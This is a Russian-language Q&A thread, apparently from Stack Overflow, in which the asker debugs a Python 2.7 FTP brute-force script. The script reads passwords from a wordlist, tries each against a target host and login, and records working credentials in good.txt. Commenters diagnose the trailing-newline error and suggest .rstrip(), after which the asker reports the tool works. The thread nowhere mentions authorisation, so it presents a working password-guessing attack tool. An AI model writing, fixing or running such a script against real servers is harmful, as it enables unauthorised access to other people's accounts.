# ValueError: an illegal newline character should not be contained

Tags: python, python-2.x, ftp, python-2.7

Такой вот код:

```
# -*- coding: utf-8 -*-
import ftplib
import argparse
import socket

parser = argparse.ArgumentParser(description='Brutforcer ftp ssh')
parser.add_argument('-s', help = 'service')
parser.add_argument('-i', help = 'host')
parser.add_argument('-l', help = 'login')
parser.add_argument('-w', help = 'wordlist')
args = parser.parse_args()
hostt = args.i
service = args.s
login = args.l
wordlist = args.w


def SFTP(hostt,login,r):
    host = hostt
    ftp_user = login
    ftp_password = r
    con = ftplib.FTP(host, ftp_user, ftp_password)
    con.close 




if service == 'ftp':
    handle = open(wordlist)

    for r in handle:
        try:
            try:
                SFTP(hostt,login,r)
                goodd = open('good.txt','a')
                goodd.write('\n')
                goodd.write('Current Service =>')
                goodd.write(service)
                goodd.write('\n')
                goodd.write('Current Host =>')
                goodd.write(hostt)
                goodd.write('\n')
                goodd.write('Current Login =>')
                goodd.write(login)
                goodd.write('\n')
                goodd.write('Current Password =>')
                goodd.write(r)
                goodd.write('\n')
                exit()
            except ftplib.error_perm:
                continue
        except socket.error:
            logs = open('errorlog.txt','a')
            logs.write('\n')
            logs.write('host unavailable')
            exit()
```

На win8.1 он у меня работает, но на win7 не работает. 
Ошибка:

```
Traceback (most recent call last):
  File "brutforce.py", line 34, in <module>
    SFTP(hostt,login,r)
  File "brutforce.py", line 22, in SFTP
    con = ftplib.FTP(host, ftp_user, ftp_password)
  File "C:\Python27\lib\ftplib.py", line 122, in __init__
    self.login(user, passwd, acct)
  File "C:\Python27\lib\ftplib.py", line 395, in login
    if resp[0] == '3': resp = self.sendcmd('PASS ' + passwd)
  File "C:\Python27\lib\ftplib.py", line 250, in sendcmd
    self.putcmd(cmd)
  File "C:\Python27\lib\ftplib.py", line 183, in putcmd
    self.putline(line)
  File "C:\Python27\lib\ftplib.py", line 175, in putline
    raise ValueError('an illegal newline character should not be contained')
ValueError: an illegal newline character should not be contained
```

Запускал так: `python brutforce.py -s ftp -i ip -l login  -w путь к файлу`.
Как я могу это исправить?

Comment: что у вас `'\n' in passwd` возвращает?

Comment: Не совсем понял вас, что надо сделать?

Comment: в вашем коде есть `ftp_password` . Есть ли в этой строке новые строки? ('\n' символ)

Comment: ftp_password берется из файла там вроде нету \n

Comment: покажите результат кода: `print(repr(ftp_password))`

Comment: Он вывел 'looln\n' (пароли в txt файле) и на нем остановился. У меня пароли идут в рядок сверху вниз

Comment: вызовите `.rstrip()` см. [Запрет переноса строк](https://ru.stackoverflow.com/q/867353/23044)

Comment: В какой части моего кода его вызвать?

Comment: в части, ответственной за чтение паролей из файла.

Comment: ftp_password = r.rstrip() все заработало